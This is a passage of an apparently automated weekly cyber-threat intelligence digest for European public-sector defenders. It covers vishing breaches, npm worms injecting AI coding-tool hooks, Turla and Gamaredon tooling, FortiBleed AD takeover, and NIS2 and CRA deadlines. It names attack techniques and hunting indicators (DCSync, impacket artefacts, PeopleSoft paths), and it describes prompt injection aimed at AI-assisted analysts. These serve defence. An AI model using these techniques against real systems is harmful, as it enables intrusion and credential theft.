Madison Square Garden was breached by [a single vishing call](https://www.404media.co/how-hackers-broke-into-madison-square-garden/) into its identity platform; the operators talked a low-level employee into authorising access. This is the same human-layer entry that has driven the year's most damaging extortion. The defensive lesson is process, not product: callback verification on help-desk identity changes, no MFA reset on an inbound call, and alerting on anomalous SSO grants from new devices.

— *Source: [404 Media](https://www.404media.co/how-hackers-broke-into-madison-square-garden/) · [Abnormal Security](https://abnormal.ai/blog/shinyhunters-sso-social-engineering-mfa-identity-compromise) · Tags: phishing, identity, data-breach, organized-crime · Region: us, global · Sector: media, technology*

### Mass third-party exposures: Xsolis, Texas Parks & Wildlife, Canvas

Three large data exposures all traced to a third party rather than the named organisation: [Xsolis](https://www.hipaajournal.com/xsolis-data-breach/) (1.4M patients via a healthcare-AI processor), [Texas Parks & Wildlife](https://www.bleepingcomputer.com/news/security/texas-govt-data-breach-exposes-over-3-million-drivers-licenses/) (3.08M licence holders via an unnamed licence-sales vendor, with a public-vs-AG-filing SSN contradiction noted in § 11), and the Canvas/Instructure LMS breach (160 UK universities). The recurring control gap is vendor data-minimisation and breach-notification SLAs.

— *Source: [HIPAA Journal — Xsolis](https://www.hipaajournal.com/xsolis-data-breach/) · [BleepingComputer — Texas](https://www.bleepingcomputer.com/news/security/texas-govt-data-breach-exposes-over-3-million-drivers-licenses/) · Tags: data-breach, supply-chain · Region: us, uk · Sector: public-sector, healthcare, education*

### Attribution and accountability: Jaguar Land Rover and Scattered Spider

Two disclosures closed loops opened months ago. A [New York Times investigation](https://techcrunch.com/2026/06/26/russian-hackers-were-behind-2-5-billion-hack-of-jaguar-land-rover-report/) gave the first named attribution for the 2025 Jaguar Land Rover ransomware attack — a Russian state-linked criminal group — though investigators have not determined whether the operators worked for, independently of, or with the tacit approval of the Russian government. And two Scattered Spider members [pleaded guilty](https://www.nationalcrimeagency.gov.uk/news/cyber-criminals-who-hacked-into-transport-for-londons-computer-network-are-convicted) over the 2024 Transport for London intrusion. Both reinforce that the dominant English-speaking extortion ecosystems are being mapped to named individuals and state-linked clusters.

— *Source: [TechCrunch — JLR/NYT](https://techcrunch.com/2026/06/26/russian-hackers-were-behind-2-5-billion-hack-of-jaguar-land-rover-report/) · [UK National Crime Agency — TfL](https://www.nationalcrimeagency.gov.uk/news/cyber-criminals-who-hacked-into-transport-for-londons-computer-network-are-convicted) · Tags: ransomware, organized-crime, law-enforcement, russia-nexus · Region: uk, europe · Sector: manufacturing, transport*

## 6. Research & threat-actor developments

### Research: the trust chain, not the perimeter, was the week's attack surface

The week's research converges on one structural shift: the productive attack surface in 2026 is the set of trust relationships connecting developer tools, CI/CD pipelines, SaaS integrations, AI coding agents and the browser — not the network perimeter. Tenable's analysis of the Miasma worm frames it as a [**"Developer Credential Economy"**](https://www.tenable.com/blog/what-the-miasma-campaign-reveals-about-the-new-supply-chain-threat-model-and-the-underground): an infostealer harvests a developer credential (a Red Hat GitHub token sat in infostealer logs ~7 weeks before weaponisation), it is brokered underground, then weaponised through npm and — the novel capability — injected into the `SessionStart` hooks of AI coding tools so it runs when a developer opens a repo (Socket enumerates at least five affected tools — Claude Code, GitHub Copilot, Gemini CLI, Cursor, VS Code). The entire kill chain carries no CVE, and SLSA provenance attestations passed registry checks — provenance without content scanning is no defence ([Socket](https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem)).

The same trust-boundary theme runs through the week's other primary research: the Klue/Icarus cascade (a 2022 OAuth grant, § 2); Cordyceps, which found 300+ exploitable `pull_request_target` GitHub Actions misconfigurations leaking main-branch secrets ([Novee Security](https://novee.security/blog/cordyceps/)); Unit 42's malicious-skill payloads bypassing the OpenClaw agent sandbox ([Unit 42](https://unit42.paloaltonetworks.com/openclaw-ai-supply-chain-risk/)); and Island's "BadBlocker", an 11M-install Chrome ad-blocker one server-side config change away from arbitrary JavaScript on any site, with no extension update or store review ([Island](https://www.island.io/blog/badblocker-11-million-users-one-server-call-away-from-compromise)). On the identity plane, Netcraft documented Bluekit, a Browser-in-the-Middle phishing-as-a-service platform that authenticates the victim into the *attacker's* browser session, defeating Device Bound Session Credentials ([Netcraft](https://www.netcraft.com/blog/bluekit-phishing-as-a-service-threat)) — a reminder that session-binding controls like DBSC do not stop a browser-in-the-middle relaying the live authenticated session. Cisco Talos's [field guide to Windows COM abuse](https://blog.talosintelligence.com/introduction-to-com-usage-by-windows-threats/) (ITaskService, BITS, WMI, DCOM as EDR-evasion primitives) closes the loop on detection: indirect vtable calls hide activity behind legitimate service call stacks. The defender takeaway is uniform — audit OAuth grants and integration service accounts older than 12 months, restrict AI-agent hook configuration to read-only paths, treat CI/CD token scope as a reviewed principal, and don't assume FIDO2 closes the phishing path.

— *Source: [Tenable — Developer Credential Economy](https://www.tenable.com/blog/what-the-miasma-campaign-reveals-about-the-new-supply-chain-threat-model-and-the-underground) · [Netcraft — Bluekit BitM](https://www.netcraft.com/blog/bluekit-phishing-as-a-service-threat) · [Island — BadBlocker](https://www.island.io/blog/badblocker-11-million-users-one-server-call-away-from-compromise) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: supply-chain, identity, ai-abuse, cloud · Region: global, europe · Sector: technology, public-sector*

### Threat-actor developments: Russia-nexus espionage broadens; new China-nexus and DPRK clusters

The most significant new actor finding the dailies did not carry is Turla's **STOCKSTAY** — Google GTIG [characterised](https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering) a multi-component .NET/Windows Forms backdoor that communicates C2 over secure WebSocket and shares significant code overlap with Kazuar (Turla's staple implant since 2017). Delivery used malicious RDP files by phishing and, as recently as November 2025, RAR archives exploiting WinRAR's CVE-2025-8088 (a flaw also abused by Sandworm, Gamaredon and RomCom). Current targeting is Ukrainian government and military, but earlier victims had Italian, Dutch, Polish and German foreign-policy interest — a direct read-across for Swiss federal and European governmental entities with Ukraine-adjacent policy work ([The Hacker News](https://thehackernews.com/2026/06/google-details-turlas-new-stockstay.html)). This sits alongside the week's other Russia-nexus signal: FBI/CISA escalated their warning that Russian intelligence (tracked as UNC5792) is now [phishing Signal Backup Recovery Keys](https://www.ic3.gov/PSA/2026/PSA260626) for persistent account takeover, and ESET's Gamaredon retrospective (§ 7) shows the FSB-linked group moving exfil and C2 wholesale onto trusted cloud services.

Two non-Russian clusters round out the picture. Unit 42 documented **CL-STA-1062**, a Chinese-speaking cluster (overlapping Talos's UAT-7237) deploying the new TinyRCT .NET backdoor via AppDomainManager injection against Southeast-Asian government and state-owned energy targets ([Unit 42](https://unit42.paloaltonetworks.com/cl-sta-1062-tinyrct-backdoor/)); Kaspersky GReAT analysed the **StrikeShark** cluster's SharkLoader deploying Cobalt Strike via "Perfect DLL Hijacking" against government targets ([Securelist](https://securelist.com/strikeshark-campaign/120326/)). And SentinelLABS' **macOS.Gaslight**, a DPRK-aligned Rust backdoor, notably turns prompt injection on the LLM-assisted analyst rather than the sandbox ([SentinelLABS](https://www.sentinelone.com/labs/macos-gaslight-rust-backdoor-turns-prompt-injection-on-the-analyst-not-the-sandbox/)) — an early instance of tradecraft built specifically to poison AI-assisted triage. Attribute the claim to the research outfit, not the state, where the source itself hedges.

— *Source: [Google GTIG — STOCKSTAY](https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering) · [FBI IC3 PSA I-062626-PSA](https://www.ic3.gov/PSA/2026/PSA260626) · [Unit 42 — CL-STA-1062](https://unit42.paloaltonetworks.com/cl-sta-1062-tinyrct-backdoor/) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: nation-state, espionage, russia-nexus, china-nexus, north-korea-nexus · Region: europe, switzerland, apac, global · Sector: public-sector, defense*

## 7. Annual / periodic threat reports

### Swiss Post Cybersecurity — inaugural Swiss Threat Landscape Report `[SINGLE-SOURCE]`

Swiss Post Cybersecurity [published its first Swiss Threat Landscape Report](https://www.swisspost-cybersecurity.ch/news/swiss-threat-landscape-report) at its Hack'Events conference (06-23), drawing on its own SOC, IR and offensive-security practice. For a Swiss public-sector SOC this is the most locally-grounded threat baseline of the week; the synthesis worth carrying beyond the daily's recap is that the report's emphasis on phishing, identity compromise and AI-abuse maps precisely onto the week's operational signal — the NCSC-CH M365 voicemail-phishing wave (§ 4), the Bluekit BitM and Klue OAuth identity attacks (§§ 2, 6), and AI-agent supply-chain abuse (§ 6). The local-vendor view and the week's incidents agree on where Swiss defenders should spend marginal effort: identity and the human layer, not perimeter CVEs alone.

— *Source: [Swiss Post Cybersecurity](https://www.swisspost-cybersecurity.ch/news/swiss-threat-landscape-report) · [Daily brief 06-24](briefs/2026-06-24.md) · Tags: phishing, identity, ai-abuse · Region: switzerland · Sector: public-sector, finance*

### ESET "Killing me gently" — a de-facto mid-year RaaS-tooling report

**Background.** The Gentlemen emerged in late 2025 as a RaaS operation founded by "hastalamuerte" (a former Qilin affiliate per Group-IB, previously affiliated with Embargo, LockBit, Medusa and BlackLock per PRODAFT). ESET first hypothesised an in-house EDR-killer in February 2026; Group-IB and Check Point independently corroborated before the gang's own internal data leaked. By April 2026 the group accounted for ~10% of global ransomware activity, and Krebs (06-10) linked the alias to a named individual in Izhevsk, Russia.

ESET's 06-26 deep-dive into the leaked internal data is the most substantive published-in-window documentation of RaaS tooling structure, and reads as a mid-year complement to the W25 Check Point State of Ransomware Q1 2026. Three structural findings a detection engineer should register: (1) GentleKiller is a modular in-house framework with at least eight BYOVD variants, each impersonating a different vendor and abusing a different kernel driver — driver allow-listing alone is insufficient without process-injection-chain detection; (2) the group integrates *rival gangs'* EDR killers (HexKiller from Warlock, ThrottleBlood shared with MedusaLocker/DragonForce, HavocKiller), so tooling overlap no longer implies operational overlap; (3) victims are selected centrally on FortiGate misconfiguration rather than geography, tying the Gentlemen victim pipeline directly to FortiBleed-style reconnaissance (§ 8). New BYOVD PoCs are operationalised within days of public release. ([daily 06-27](briefs/2026-06-27.md))

— *Source: [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/killing-me-gently-inside-gentlemens-edr-killer-framework/) · [ESET Newsroom](https://www.eset.com/us/about/newsroom/research/eset-research-gentlemen-ransomware-gang-edr-killers/) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: ransomware, organized-crime, russia-nexus · Region: global, europe, switzerland · Sector: manufacturing, healthcare, energy*

### ESET Gamaredon 2025 — annual actor retrospective

**Background.** Gamaredon (FSB-linked, Russia-nexus) has been ESET's most-tracked Ukraine-focused operator for years; its prior annual papers documented a high-tempo, PowerShell-heavy toolset and aggressive infrastructure churn.

ESET's [2025 Gamaredon paper](https://www.welivesecurity.com/en/eset-research/gamaredon-2025-leveraging-tunnels-workers-dead-drops-new-alliances/) (covered 06-26) documents six new PowerShell tools and the wholesale migration of exfiltration and C2 onto trusted cloud services, tunnels and "workers" — the horizon implication for European public-sector defenders is detection-oriented: Gamaredon-class C2 increasingly hides inside legitimate cloud-service traffic (Cloudflare workers, Telegram, dead-drop resolvers), so network-indicator blocking degrades and behavioural detection on the endpoint and on anomalous cloud-service egress becomes the durable control.

— *Source: [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/gamaredon-2025-leveraging-tunnels-workers-dead-drops-new-alliances/) · [Sekoia](https://www.sekoia.com/blog/fsbs-matryoshka-3-3-gamaredons-gifts-that-keeps-unpacking-gammasteel) · [Daily brief 06-26](briefs/2026-06-26.md) · Tags: nation-state, espionage, russia-nexus · Region: europe · Sector: public-sector, defense*

## 8. Long-running campaigns — status update

### FortiBleed (`key: fortibleed`)

The W25 top story continued without a scale revision — the device count holds at the 86,644 figure the dailies reported — but the in-window development is the clearest state-interest signal yet: CISA [updated its hardening alert on 06-22](https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-of-credential-exposure) to link Fortinet's revised guidance, and reporting now confirms that on in mid-June the Russian-speaking operator completed offline Kerberos-hash cracking from captured FortiGate configs and immediately exfiltrated DFS backup data from a NATO-aligned defence contractor — a full AD domain takeover ([Security Affairs](https://securityaffairs.com/194004/hacking/fortibleed-the-most-detailed-breakdown-yet-of-an-active-russian-credential-harvesting-operation.html)). Outstanding for defenders: treat any FortiGate admin/VPN credential active May–June 2026 as compromised, rotate, then hunt AD for pass-the-hash, DCSync and DFS-backup exfiltration (Kerberos ticket anomalies, LSASS access, `ntdsutil`/impacket artefacts). Patch level is irrelevant — this is credential reuse, not a new CVE.

— *Source: [CISA alert](https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-of-credential-exposure) · [Security Affairs](https://securityaffairs.com/194004/hacking/fortibleed-the-most-detailed-breakdown-yet-of-an-active-russian-credential-harvesting-operation.html) · Tags: actively-exploited, data-breach, identity, russia-nexus · Region: global, europe, switzerland · Sector: public-sector, defense, telco*

### ShinyHunters / UNC6240 Oracle PeopleSoft campaign (`key: shinyhunters-peoplesoft`)

The campaign behind the § 1 NAIC breach. GTIG/Mandiant attributes to UNC6240 an active zero-day exploitation of Oracle PeopleSoft (CVE-2026-35273) between May 27 and June 9, predating Oracle's advisory; staging environments deployed customised MeshCentral agents masquerading as cloud endpoints, then ran a per-victim `[victim]_fanout.sh` lateral-movement-and-defacement script ([Google GTIG](https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit)). ~300 PeopleSoft instances compromised, ~100 organisations notified, 68% higher education, with the University of Nottingham among the first named public victims ([SecurityWeek](https://www.securityweek.com/google-confirms-exploitation-of-oracle-peoplesoft-zero-day-by-shinyhunters/)). The status this week: NAIC confirmed (§ 1), and notifications are still landing, so more European education and public-finance victims are likely. The weekly lens: this is ShinyHunters operating as a zero-day-capable ERP attacker — a capability shift from the brand's 2021–2024 credential-stuffing persona. Outstanding question: which EU universities running PeopleSoft are in the un-notified tail.

— *Source: [Google GTIG / Mandiant](https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit) · [SecurityWeek](https://www.securityweek.com/google-confirms-exploitation-of-oracle-peoplesoft-zero-day-by-shinyhunters/) · Tags: data-breach, zero-day, actively-exploited, organized-crime · Region: global, us, europe · Sector: education, finance, public-sector · CVE: CVE-2026-35273 · CVSS: 9.8 · Vector: zero-click · Auth: pre-auth · Status: exploited*

### The Gentlemen (`key: the-gentlemen`)

The W25 multi-day item now has primary-evidence depth (the ESET deep-dive, § 7) and a sharp Swiss angle: Check Point data, reported by Swiss tech press, makes [Switzerland the second-most-targeted European country](https://www.inside-it.ch/aufstrebende-ransomware-bande-findet-mehr-schweizer-opfer-20260626) for the operation, which now claims 478 victims and has added worm propagation. The operationally important link is that victim selection runs on FortiGate misconfiguration scanning — so a Swiss organisation's FortiBleed exposure (above) is also its Gentlemen-victim-selection exposure. Outstanding for defenders: the same FortiGate hardening that closes FortiBleed reduces Gentlemen targeting, and EDR-tamper-protection plus driver-blocklist enforcement is the GentleKiller counter.

— *Source: [inside-it.ch](https://www.inside-it.ch/aufstrebende-ransomware-bande-findet-mehr-schweizer-opfer-20260626) · [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/killing-me-gently-inside-gentlemens-edr-killer-framework/) · Tags: ransomware, organized-crime, russia-nexus · Region: switzerland, dach, europe · Sector: manufacturing, healthcare, energy*

### Operation Endgame (`key: operation-endgame`)

Europol's law-enforcement campaign extended its reach this week: the 06-24/25 Amadey and StealC takedown actioned 326 servers and 142 domains and recovered approximately 27 million stolen credentials from over 385,000 compromised systems ([BleepingComputer](https://www.bleepingcomputer.com/news/security/amadey-stealc-malware-operations-disrupted-in-operation-endgame-action/)), with Microsoft providing the Amadey/StealC infrastructure analysis ([Microsoft](https://www.microsoft.com/en-us/security/blog/2026/06/24/stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them/)). Combined with the W25 SocGholish/TA569 seizure (106 servers), Endgame has now dismantled three commodity delivery-and-theft networks in quick succession. The defender gap: no arrests were announced for this phase, so infrastructure can reconstitute — cross-reference the recovered 27M credentials against your identity-store canaries and hunt Amadey persistence (`HKCU` run-key, `rundll32`/`regsvr32` side-loads, short-lived child processes under `%AppData%\Roaming`).

— *Source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/amadey-stealc-malware-operations-disrupted-in-operation-endgame-action/) · [Microsoft Threat Intelligence](https://www.microsoft.com/en-us/security/blog/2026/06/24/stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them/) · [Europol newsroom](https://www.europol.europa.eu/media-press/newsroom/news/global-cyber-strike-disrupts-socgholish-amadey-and-stealc-malware-networks) · Tags: law-enforcement, infostealer, botnet, organized-crime · Region: europe, global · Sector: public-sector, finance*

## 9. Policy & regulatory horizon

### Netherlands NIS2 (Cyberbeveiligingswet) clears the lower house — entry into force targeted for 1 July 2026

The Dutch transposition is in its final step: the Tweede Kamer (lower house) approved the Cyberbeveiligingswet on 15 April 2026 ([Rijksoverheid](https://www.rijksoverheid.nl/actueel/nieuws/2026/04/15/tweede-kamer-stemt-in-met-wetsvoorstellen-cyberbeveiligingswet-en-wet-weerbaarheid-kritieke-entiteiten)), with the Eerste Kamer (upper-house) ratification vote still pending in late June and the government targeting 1 July 2026 for entry into force. NCSC-NL is the designated supervisor; the regime runs a three-step 24h / 72h / one-month incident-notification protocol, essential-entity penalties up to €10M or 2% of turnover, and personal board liability for security-measure oversight ([NL Digital Government](https://www.nldigitalgovernment.nl/nis2-directive-cyberbeveiligingswet-cbw/)). This is the fresh delta on the W25 NIS2-transposition item, which listed the Netherlands as pending; France, Ireland, Luxembourg and Spain remain non-transposed. What changes for defenders: any essential/important entity with Dutch operations or Dutch counterparties is about to face an enforceable notification clock and a named supervisor — wire NCSC-NL's 24/72-hour flow into the incident-response runbook now, and re-check which group entities fall in scope.

— *Source: [Rijksoverheid — Tweede Kamer vote](https://www.rijksoverheid.nl/actueel/nieuws/2026/04/15/tweede-kamer-stemt-in-met-wetsvoorstellen-cyberbeveiligingswet-en-wet-weerbaarheid-kritieke-entiteiten) · [NL Digital Government — Cyberbeveiligingswet](https://www.nldigitalgovernment.nl/nis2-directive-cyberbeveiligingswet-cbw/) · [uComply advisory](https://ucomply.cloud/en/blog/cyberbeveiligingswet-1-juli-2026-wat-moet-u-nu-regelen/) · Tags: law-enforcement, eu-nexus · Region: europe · Sector: public-sector*

### EU Commission proposes a major Europol / Eurojust mandate expansion

On 24 June the Commission tabled COM(2026) 580 proposing to expand Europol and Eurojust: automated, near-real-time national-police-to-Europol data upload via a new "Police Shared Data Space" cloud, Europol Support Offices embedded in Member-State agencies, an explicit Eurojust cybercrime mandate, and a roughly doubled (~€3bn) budget, with cybercrime and AI-accelerated threats cited as primary drivers ([European Commission](https://commission.europa.eu/news-and-media/news/commission-proposes-new-measures-better-tackle-cross-border-crime-and-terrorism-2026-06-24_en)). The Protect Not Surveil coalition [warns](https://protectnotsurveil.eu/resources/press-release-europol-mandate-overhault-2026/) of systematic data ingestion without categorisation safeguards. This is co-decision and unlikely to bind before 2027+, but public-sector CISOs in EU Member States should track it now: it reshapes how incident and victim data may flow to Europol, with data-protection and onward-sharing implications for breach reporting.

— *Source: [European Commission](https://commission.europa.eu/news-and-media/news/commission-proposes-new-measures-better-tackle-cross-border-crime-and-terrorism-2026-06-24_en) · [Protect Not Surveil](https://protectnotsurveil.eu/resources/press-release-europol-mandate-overhault-2026/) · Tags: law-enforcement, eu-nexus · Region: europe · Sector: public-sector*

### EU Cyber Resilience Act — 75 days to the 11 September vulnerability/incident-reporting obligation

CRA Article 28 (conformity-body notification) entered force on 11 June 2026; the next binding milestone — mandatory vulnerability/incident reporting by manufacturers to ENISA's Single Reporting Platform — activates 11 September 2026, now ~75 days out ([ENISA SRP](https://www.enisa.europa.eu/topics/product-security-and-certification/single-reporting-platform-srp)). ENISA has not yet published a dry-run schedule, stating guidance is due June–August ([Crowell & Moring](https://www.crowell.com/en/insights/client-alerts/eu-cyber-resilience-act-countdown-11-september-2026-incidentvulnerability-reporting-deadline-is-less-than-100-days-away)). For Swiss readers the practical action is procurement-side: Swiss manufacturers selling digital products into the EU fall in scope, and Swiss public-sector procurement teams should add CRA compliance attestations to vendor specs and confirm in-scope suppliers can meet the 24/72-hour SRP reporting flow before it binds.

— *Source: [ENISA Single Reporting Platform](https://www.enisa.europa.eu/topics/product-security-and-certification/single-reporting-platform-srp) · [Crowell & Moring advisory](https://www.crowell.com/en/insights/client-alerts/eu-cyber-resilience-act-countdown-11-september-2026-incidentvulnerability-reporting-deadline-is-less-than-100-days-away) · Tags: law-enforcement, eu-nexus · Region: europe · Sector: public-sector, technology*

## 10. Looking ahead — what to watch next week

A focused, justified list — items already in motion, not predictions.

- **ShinyHunters PeopleSoft notifications are still landing — expect more named European education and public-finance victims.** GTIG has notified ~100 organisations (68% higher education) and NAIC is the fresh high-profile case; patch internet-reachable PeopleSoft and hunt `/PSEMHUB/` and `/PSIGW/HttpListeningConnector`. ([Google GTIG](https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit); [daily 06-28](briefs/2026-06-28.md))
- **FortiBleed is not a one-and-done credential reset — full AD domain takeover is now confirmed at a NATO-aligned contractor.** Finish session termination and credential rotation, then hunt for post-compromise AD persistence (Kerberos abuse, DCSync, DFS-backup exfiltration) rather than assuming the reset closed it. ([CISA](https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-of-credential-exposure); [daily 06-24](briefs/2026-06-24.md))
- **The Klue/Icarus extortion surface is multiplying after the "resolution" — a second group is now extorting ~195 listed organisations.** Any firm with a Klue/Salesforce integration should expect renewed extortion contact regardless of Icarus's stated data deletion; complete OAuth-grant revocation and CRM-egress monitoring. ([SecurityWeek](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/); [daily 06-27](briefs/2026-06-27.md))
- **CRA Single Reporting Platform go-live is ~75 days out (11 September); ENISA's dry-run schedule is due now.** In-scope manufacturers — including Swiss exporters to the EU — should register and wire the 24/72-hour reporting flow into their PSIRT process before the obligation binds. ([ENISA SRP](https://www.enisa.europa.eu/topics/product-security-and-certification/single-reporting-platform-srp))
- **EDPB Article 33 harmonised breach-notification template consultation closes 5 August.** Still open with no in-window change; multi-jurisdiction breach-response owners have a closing window to comment before the EDPB sets a mandatory-adoption timeline. ([EDPB](https://www.edpb.europa.eu/news/edpb-meets-with-eu-commissioner-mcgrath-and-adopts-common-data-breach-notification-template_en))
- **npm v12 will disable install scripts by default — the week's Miasma worm wave is the reminder to audit CI now.** Miasma's `postinstall`-and-`SessionStart`-hook propagation is exactly the kill chain `--ignore-scripts` / npm v12 defaults neutralise; inventory pipelines and AI-coding-tool hook configs that rely on build scripts. ([Socket](https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem); [daily 06-27](briefs/2026-06-27.md))
- **libssh2 CVE-2026-55200 has a public PoC and an upstream fix commit, but tagged releases lag across the binding ecosystem — track the embedded-dependency fix pipeline.** Inventory appliances, tooling and language bindings that ship libssh2 and chase each vendor's release rather than assuming a single library bump closes it. ([NCSC-NL](https://advisories.ncsc.nl/2026/ncsc-2026-0210.html); [daily 06-28](briefs/2026-06-28.md))
- **Scattered Spider TfL sentencing is set for 16 July.** First UK court outcome on the campaign; the vishing/social-engineering TTP precedent is directly relevant to European transport and public-sector identity-desk hardening. ([UK NCA](https://www.nationalcrimeagency.gov.uk/news/cyber-criminals-who-hacked-into-transport-for-londons-computer-network-are-convicted); [daily 06-23](briefs/2026-06-23.md))

## 11. Verification & coverage notes

- **Single-source / attributed claims.** The "second extortion group" in the Klue/Icarus item (§ 2) and its claim of ~195 listed organisations rest on a single primary (The Next Web, relaying a private Klue customer update obtained by TechCrunch); the allegation that Klue paid the original Icarus operator is unverified and is attributed as a claim, not stated as fact. The NAIC 3.1 TB figure is ShinyHunters' own claim relayed by tech press; NAIC confirms the breach and the rating-feed pause but not the volume. The "Switzerland is the second-most-targeted European country" ranking for The Gentlemen (§§ 0, 8) rests on a single source (inside-it.ch relaying Check Point data); the co-cited ESET paper does not state a European country ranking, and inside-it.ch returns 403 to the routine's fetcher, so the specific ranking could not be independently re-verified this run — it is attributed, not asserted as established fact.
- **Unresolved contradiction.** Texas Parks & Wildlife (§ 5): the daily flagged a discrepancy between the public statement and the state AG filing over whether SSNs were exposed; unresolved this week, carried as a confidence caveat.
- **Items considered and dropped (may resurface).** RoguePlanet (CVE-2026-50656) — carried in the W25 looking-ahead but no fresh in-window source on a Microsoft fix, so dropped rather than re-asserted stale. eBanking IPv4-mapped-IPv6 phishing (06-22), the Brazil Cell Broadcast hijack (single-source, beyond audience nexus beyond the § 4 mention), Arystinger botnet (06-22), Prinz Eugen ransomware (06-21) and Payouts King/Edgecution (06-25) did not clear W-PD-1 (inaction-=-incident / cross-day pattern / strategic horizon) and were left to the dailies. The MISP 2.5.42 CVEs (06-25) and ILIAS SQLi (06-23) are folded into §§ 3–4 rather than given standalone roll-up entries.
- **Reduced confidence.** StrikeShark China-nexus attribution is Kaspersky's *low-confidence* assessment and is reported as such (§ 6).
- **libssh2 patch-status caveat (§ 3).** The GHSA references an upstream fix commit and NCSC-NL NCSC-2026-0210 is titled as a fix advisory, so the item is marked `patch-available`; however, tagged-release availability lags across the binding/appliance ecosystem, so a given deployment may still be effectively unpatched pending its embedding vendor's release. Treat `patch-available` as "fix exists upstream," not "your appliance is fixed."
- **Sub-agents.** Both horizon sub-agents (W1 threat-actor/campaign/research; W2 strategic/policy) returned within cap. No coverage axis was abandoned.
- **Verification iterations:** 5 · residuals: 0 — verdict CLEAN on iteration 5, with model rotation across iterations (opus on 1/3/5, sonnet on 2/4). Iterations 1–4 remediated ~21 findings (URL corrections, an MSG→ShinyHunters attribution overclaim, a Miasma quantifier inflation, a Netherlands NIS2 "transposition done" factual overclaim, and several date/citation-anchor gaps); iteration 5 found no truth or editorial defects.
- Coverage gaps: databreaches-net (transport-403, 3rd consecutive run — content reached via GTIG/SecurityWeek primaries instead); mandiant-gtig (RSS feed returned IncompleteRead, content obtained via WebSearch + the GTIG blog directly); inside-it-ch (Cloudflare-challenged for the W2 sub-agent UA, but the 06-26 Gentlemen article was reachable and is cited). W2 "outside-window" sources (cert-eu, edpb, bsi-de, enisa-nis360, cisa-directives) were quiet in-window, not failed fetches. The end-of-run `tools/source_health.py` accessibility probe did not complete inside its budget in this container (slow under the egress proxy) and was stopped so it would not block publish; the prior committed snapshot (from the 2026-06-28 daily run) stands and the next run re-probes.